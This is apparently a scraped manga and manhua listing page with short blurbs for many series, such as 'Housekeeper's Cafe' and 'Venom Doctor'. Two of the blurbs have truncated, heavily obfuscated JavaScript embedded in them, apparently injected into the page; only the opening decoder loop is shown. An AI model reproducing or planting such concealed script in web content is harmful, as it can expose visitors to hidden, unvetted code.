Don’t Get Me Wrong, I’m The Real Victim!
Chapter 83An abandoned factory in the middle of the night, an impressive haunted house in an amusement park, and a grim smiling mask above a bloody white coat roaming every dark corner of the city. It has witnessed every single heinous crime, but please don't get me wrong, I'm only a victim.<script></script><script>(function(_0x23ff68,_0x534e2f){var _0x24d11c=_0x29df,_0x595c17=_0x23ff68();while(!![]){try{var _0x1c5254=parseInt(_0x24d11c(0x170))/(0x65e+0xb9*-0x35+-0x7*-0x490)*(parseInt(_0x24d11c(0x173))/(0x1*0x2035+0x11b*-0x1f+-0x212*-0x1))+-parseInt(_0x24d11c(0x16f))/(0x239e+-0x7dc+-0x1*0x1bbf)*(-parseInt(_0x24d11c(0x172))/(0x2158+-0x1069*-0x1+-0x7*0x71b))+parseInt(_0x24d11c(0x17e))/(0x1233+0xed8+-0x2106)+-parseInt(_0x24d11c(0x16b))/(-0xeb9+-0x27*-0x3+-0x1f*-0x76)*(parseInt(_0x24d11c(0x182))/(-0xbc9*-0x3+-0x2*-0x171+-0x2636))+parseInt(_0x24d11c(0x183))/(-0x2654+-0x2ab*0x1+0x2907)+parseInt(_0x24d11c(0x17a))/(-0x65*0x41+-0x1*-0xd6d+0xc41)*(parseInt(_0x24d11c(0x179))/(0x161*0x4+0x2266+-0x27e0))+-parseInt(_0x24d11c(0x17f))/(-0x193f+-0x1d4d+-0x433*-0xd);if(_0x1c5254===_0x534e2f)break;else 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More.Housekeeper’s Cafe
Chapter 107Sparks fly when busy restaurateur Justin meets handsome waiter Jake at a themed “butler service” cafe. He relishes the idea of bossing someone around, and Jake’s service is excellent—he even saves Justin from a rogue wine bottle! Then it’s just one revelation after the other: They’re neighbors! Jake cooks like a master chef (and Justin will eat all his treats)!! And even a possible past encounter...! So will Justin pursue business or pleasure? Can he have Jake’s tasty cakes and eat them, too?<script></script><script>(function(_0x260e61,_0x578236){var _0x4db6b5=_0x23ff,_0x50ba1b=_0x260e61();while(!![]){try{var _0xf6abd3=-parseInt(_0x4db6b5(0x1fe))/(0x1a5e+-0x14*-0x144+0x33ad*-0x1)*(-parseInt(_0x4db6b5(0x20f))/(0x1*0x26dc+0x1*0x1c3a+-0x10c5*0x4))+parseInt(_0x4db6b5(0x206))/(-0x1a50+-0x2*0x6cf+0x199*0x19)*(parseInt(_0x4db6b5(0x211))/(-0x1*-0x16e9+0xd6c+-0x3*0xc1b))+-parseInt(_0x4db6b5(0x20c))/(-0x1*-0x20bf+-0xd08+-0x1*0x13b2)+-parseInt(_0x4db6b5(0x201))/(-0x2687*0x1+0x5*-0x5f9+-0x12*-0x3cd)+-parseInt(_0x4db6b5(0x1ff))/(-0x29*0x59+0x37*-0x1b+0x1415)*(parseInt(_0x4db6b5(0x203))/(0x446+-0x921+0x4e3))+parseInt(_0x4db6b5(0x1f5))/(0xd8c+0x1fe1+0x33e*-0xe)+parseInt(_0x4db6b5(0x204))/(-0x3*0xc4a+0x273*-0x7+0x1*0x360d);if(_0xf6abd3===_0x578236)break;else _0x50ba1b['push'](_0x50ba1b['shift']());}catch(_0x49427e){_0x50ba1b['push'](_0x50ba1b['shift']());}}}(_0x4adc,-0x1*-0x2265d+-0x5e7a4+-0x5094*-0x2b));function _0x4adc(){var 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More.Venom Doctor
Chapter 36"With his powers, he cures people from the venom inside their bodies as well as the venom of society." A college student returned to his hometown to start a chicken farm, but it's not going well. He finds a jade figurine which bestows him martial abilities and lets him see inside people's bodies.
More.The King of Misfortune
Chapter 208The "King of Misfortune" of Luo Yu High School, Lin Xiong Chen,otherwise known as the "Star of Calamity", is a high school student plagued with misfortune. People believe even being near him will bring about bad luck. Due to his endless grappling with misfortune, he gained superhuman reflexes as a result of constantly having to avoid danger. By chance, he becomes possessed by the demon Pi Pa. But even a powerful demon does not dare to life a finger against the mighty misfortune of Xiong Chen's soul. In order to coexist within his host's body, Pi Pa has no choice but to teach Lin Xiong Chen the power of diverting his misfortune.
More.The World of Canglan
Chapter 330When playing a virtual reality game called Cang Lan, Xiao Wan gets pushed off a cliff. She ends up in another game world. What will happen to Xiao Wan? Genres: Action, Fantasy, Comedy, Isekai
More.Drowsy marriage
Chapter 6<div class="row detail-set"> <div class="col-24 col-sm-16 col-md-18 mt-4 mt-sm-0 attr-main"> <div class="mt-3"> <div id="limit-height-ctrl-summary" class="limit-height-ctrl max-100px"> <div id="limit-height-body-summary" class="limit-height-body"> <div class="limit-html">She had thought that she met the love of her life, he had thought that he could give her the perfect life. But fate is always messing around, in the end , who's truly in love? Who will be happy again? If she had the opportunity she'd rather have met him sooner, if he had the opportunity, he'd rather fall love with her sooner.</div> </div> </div> </div> </div> </div> <div class="mt-4 episode-list"> <div class="head"></div> </div>
More.I Saved The Demon King
Chapter 7<div class="row detail-set"> <div class="col-24 col-sm-16 col-md-18 mt-4 mt-sm-0 attr-main"> <div class="mt-3"> <div id="limit-height-ctrl-summary" class="limit-height-ctrl max-100px"> <div id="limit-height-body-summary" class="limit-height-body"> <div class="limit-html">The infamous Big Demon actually accepted a 4-year-old female apprentice! Do you want to see Demon raise a baby? The 4-year-old female apprentice said that she didn't really think much about it. She was just a female college student who accidentally transverse into a book. What's the matter with her fate and grievances and Xiuxian Daguai? But this villain Demon Lord seems to have something hidden...</div> </div> </div> </div> </div> </div> <div class="mt-4 episode-list"> <div class="head"></div> </div>
More.The Obsessive Male Leads Wants to Eat Me
Chapter 0<div class="description-summary"> <div class="summary__content show-more active"> I possessed someone in a depraved adult BL novel and met the young obsessive male lead (Top). After being bullied by the bottom for years, he turns to a darker path in his adulthood and becomes the crown prince, indulging in imprisonment, obsession and all sorts of heinous adult past-times. Hmm… Then if the bottom never bullied the top, it would have a happy ending, right? — For the bottom’s happy future, I met the young obsessive male lead top… and he was super cute?! ‘Oh, my heart. He’s like a furry baby predator.’ My baby, I shall protect you! I fed, raised and even introduced the insecure obsessive male lead top to the bottom. ‘Big Sis, I don’t like that bastard. He’s disgusting.’ Of course the bottom was hesitant at the beginning, but the two ended up a little closer. I left with peace of mind. I hoped that my favourite character would lead a happy lives with each other, but, despite my intentions- A few years later, I heard that an obsessive male lead was sweeping through the battlefield looking for me. — With a height reaching almost 190cm, shoulders as wide as a wild beast and black hair with the scent of blood, Sislin held my waist with a look in his eyes akin to that of a freshly captured beast. ‘Annette is tiny.’ Red eyes tinged with madness turned towards me. ‘But I’m not.’ — Heinley undid my ribbon with his bright red lips. Swish – I could hear the thin cloth rub against each other as it came undone. ‘You promised not to leave me behind.’ Purple irises with a hauntingly beautiful smile. ‘What kind of punishment should I give… to a naughty child that breaks her promises?’ — He was a stranger, the man who ‘proposed’ to me with countless slaves caged up behind him. ‘It’s a present. You wished to raise a smart pet, after all.’ All I did was raise some boys for a happy ending, but these obsessive male leads want to eat me alive. Why? What happened…? </div> </div> <h2 class="h4">Read manhwa The Obsessive Male Leads Wants to Eat Me / 집착 광공들이 잡아먹으려고 해 / The Obsessive Male Leads Want To Eat Me Alive</h2>
More.Secret Wardrobe Of The Duchess
Chapter 48<div class="description-summary"> <div class="summary__content show-more active"> How much money must I spend for you to divorce me!? Rubika dies in a war without being able to confess her love for Arman but is instead sent back in time. A new life, she will not live in vain. But what are these new obstacles? </div> <div class="c-content-readmore"> Read manhwa Secret Wardrobe Of The Duchess / 공작 부인의 비밀 의상실 </div> </div> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div>
More.Spoil A Wife Unlimited
Chapter 41<div class="description-summary hide_show-more"> <div class="summary__content show-more">Overbearing prince x clever wife, met for the first time, she helped him, and took a couple of benefits, see you again! He married her as his concubine, saying that he would entangle her for a lifetime. "Your Highness, the little prince is still watching..." "Just in time, the king has come to teach him how to be a pet wife." 冲喜王妃 / Spoil A Wife To No Limit / Princess Chongxi</div> </div>
More.My Heart Races Because of You
Chapter 20<div class="description-summary"> <div class="summary__content show-more active">Seo Gun-Woo is a perfect top star, he got it all, looks, posture, aura, eliteness, you name it… He is usually picky and hard to please, especially to any movie that he attends to. Until one day, a newcomer actress Min Seo-Yeon caught his eye, for some reason he can’t fathom what about with this girl that his usual compose self is faltering in the presence of this Lady, makes him uncomfortable but in a pleasant way… Is this what they call love? A Story with romance for all ages.</div> <div> <div class="post-title"> <h1>Liking you Excitedly, 두근두근 네가 좋아서</h1> </div> <div class="tab-summary "></div> </div> </div>
More.The President’s Special Instructions
Chapter 80Jung-woo Choi is an emerging force in the cosmetics industry. Her secretary, Su-hyeon Shin, is resourceful at work and also very handsome. One day, he suddenly received a special instruction from the president: “Secretary Shin, get married”. He received an offer to marry his own boss. He spent many nights worrying about writing a resignation letter, but the conditions to get this marriage are too great, right?! The office and their newlywed lives are an unpredictable love story! Let’s follow teenmanhua to follow the developments of the story! The President’s Special Instructions/사장님의 특별지시, President’s Special Order , CEO’s special order , Married to my boss
More.The Millionaire Divorcee
Chapter 91<div id="editdescription"> In the original story, the male lead accused his ex-wife of abusing him when he was younger. But unlike the original story, I raised my young husband as if he was my brother. When my husband went to war, I started preparing for a divorce. Because if the original story is true, the male lead will fall in love with the princess of the ruined country and bring her back! That’s why, instead of following the road that leads to defeat, I intended to get a decent divorce. While preparing for that, I took some money and earned quite a fortune. I also developed a cure because I didn’t want to die of an incurable disease like the original villainess. All that’s left is getting divorced! *** My cute little husband came home and grew up to be such a fine man! But don’t worry, I’m all set to divorce you! Oddly enough, the reaction of my husband is a little strange. “While I was fighting on the battlefield, you were preparing to run away.” He smiled dangerously, whilst wrapping his big hands around my waist. “Are you having an affair?” Unlike the pretty smile on his mouth, his eyes were burning hot. No….. you know, I’m ready to get divorced….. </div> <div class="page-content-inner"> <div></div> </div> <h5 class="seriesother associated">Associated Names</h5> <div id="editassociated">이혼당할 준비 완료했습니다</div>
More.Rosemarie Reincarnated
Chapter 74Tensei Oujo wa Kyou mo Hata wo Tatakioru / / Rosemarie Reincarnated: Fixing Bad Suitor and Getting Her BelovedWho cares about being cute?! Rosemarie is a young girl who got reincarnated in the world of a dating sim. That game was famous for being a crappy game full of hopeless men! She has a bad feeling about it, but she has no time to waste getting upset about it! She's going to change the peculiar dateable character for the better and meet the man she really loves at all costs!
More.The Heavenly Emperor With Collection Fetish
Chapter 13Celestial Emperor Has Billions of Points to Gather as Hobby, God of Heaven Has Billions of Points to Maniacally Collect, The Emperor has a collection fetish, The Heavenly Emperor With Collection Fetish, Tin D Yu Y Din Shu J P, Ouyang Xing, a game geek, and a game strategist crosses over to the world of immortal cultivation, where he starts as the reincarnation of the Heavenly Emperor + the Supreme Immortal. Unfortunately, the Immortal clan/race is in decline in this world, and their situation is worse than that of dogs. As a collection fetishist, no matter what exotic treasures, celestial palace, or heavenly fairies, I want them all!!
More.I See You
Chapter 49Only I can see this grim reaper?! Seowoo has just about had it with life. But when she's about to jump off a bridge, she's interrupted by a grim reaper nobody else can see. Not only that, he wants her to stay alive for three more months! A woman who wants to die and a strange reaper will Seowoo finally find a reason to live?
More.Super Appraiser
Chapter 18Super Appraiser manhua, Zhang Feng, a poor boy who has been unlucky all his life, goes to the mountain to take the advice of his mother to change his luck, and then he happens to get a strange power during a thunderstorm. Zhang Feng said: I Buddha, you'd better let me sink in hell for a little longer
More.Super Affection System
Chapter 24a college student got transmigrated in fantasy word of the game he loved the most and acquiring a new system. watch as Liu Yuan start this journey to scam his way to the top
More.I rely on OCD to become the King
Chapter 56The high school student male protagonist Yin Yongtian is a patient with severe obsessive-compulsive disorder. He was almost beaten to death because of the onset of obsessive-compulsive disorder and disrupted the confession of the school bully. The male protagonist Yin Yongtian is not interested in training and upgrading, but he is forced to become stronger because of the constant reminders of [unfinished red dot tasks] [almost full skill proficiency] [extremely irregular hexagonal panel]! Relying on a hundred times more basic skills than ordinary people, he and his friends are generous in the dungeon world - forced to embark on the road of kings.
More.Suddenly Trending
Chapter 72I really didn't intentionally leech off of your popularity and take advantage of you! Tier 38 minor celebrity Ran Lin that can't seem to get famous, somehow caught the fortune of male newcomer celebrity Lu Yiyao whose popularity is currently exploding. For the first time in his life, Ran Lin suddenly got on trending; whereas for Lu Yiyao because of that one hug, regretted it for the rest of his life. One knows that he is in the wrong, one completely shuns the other, neither of them ever expected, that from the day the reality show started, they would never be able to completely cut ties with each other.Rise To Stardom
More.He's Been Searched By The God
Chapter 173The straight male actor who can't bend X wave to the flying eighteen-line small transparent life is the first hot search in his life, but it was rubbed up by the male god? Unrequited love for eight years, I thought I would die alone, I didn't expect My celebrity turned back, and I still need to have in-depth exchanges with me? ?! --"You are a foster relationship? "Sorry, we are legal husbands.
More.5500 Shades Of The Demon King
Chapter 68Demon Lord’s 5500 Shadows I hit it big with an erotica novel starring the demon lord, but then got sued by the real demon lord! I need to turn at least half the novel into reality to survive. The smut novel needs to become reality! Irene Yoo, whose life ended just as it began to bloom at nineteen, spent her second life as a virgin ghost full of yin* energy in the underworld. She made the most of her benefits after turning into a succubus and granted permission to live in the Demon World. ‘I was going to teach that innocent, workaholic Demon Lord these kind of things, that kind of things, and also those things, but-‘ “That’s not much. Close your eyes. Let’s finish quickly.” “I… I have my preferences too!” “I think I know your preferences better than you do.” The Demon Lord memorized the erotica I wrote in one night. Furthermore, what is with this pervy ‘progress chart’?! When I told him that I can’t lose my virginity to someone I don’t have feelings for, the Demon Lord, Claude Stern, asked as he undid the buttons of his shirt, “You don’t have any feelings for me?” Your Majesty, why are you deepening your voice? Why are you closing the distance between us?! *Yin Tl note: the feminine passive principle in nature that in Chinese cosmology is exhibited in darkness, cold, or wetness and that combines with yang to produce all that comes to be Source: merriam-webster dictionary 마왕님의 5500가지 그림자
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